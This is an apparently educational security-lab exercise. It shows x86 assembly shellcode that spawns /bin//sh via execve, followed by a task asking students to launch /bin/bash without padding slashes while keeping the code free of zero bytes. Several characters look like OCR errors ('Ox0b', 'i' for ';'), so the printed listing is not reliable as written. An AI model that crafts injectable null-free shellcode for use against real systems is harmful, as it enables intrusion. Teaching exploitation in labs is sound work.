section .text global _start _start: ; Store the argument string on stack xor eax, eax push eax ; Use o to terminate the string push "//sh" i push "/bin" mov ebx, esp ; Get the string address ; Construct the argument array argv[] push eax ; argv[1] = 0 push ebx ; argv[0] points to the cmd string mov ecx, esp ; Get the address of argv[] ; For environment variable xor edx, edx ; No eny variable ; Invoke execve() xor eax, eax mov al, Ox0b int Ox80 i eax = 0x00000000 i eax = 0x0000000b

Task. In Line of the shellcode mysh.s, we push"//sh" into the stack. Actually, we just want to push "/sh" into the stack, but the push instruction has to push a 32-bit number. Therefore, we add a redundant / at the beginning; for the OS, this is equivalent to just one single /. For this task, we will use the shellcode to execute /bin/bash, which has 9 bytes in the command string (10 bytes if counting the zero at the end). Typically, to push this string to the stack, we need to make the length multiple of 4, so we would convert the string to /bin////bash. However, for this task, you are not allowed to add any redundant / to the string, i.e., the length of the command must be 9 bytes (/bin/bash). Please demonstrate how you can do that. In addition to showing that you can get a bash shell, you also need to show that there is no zero in your code.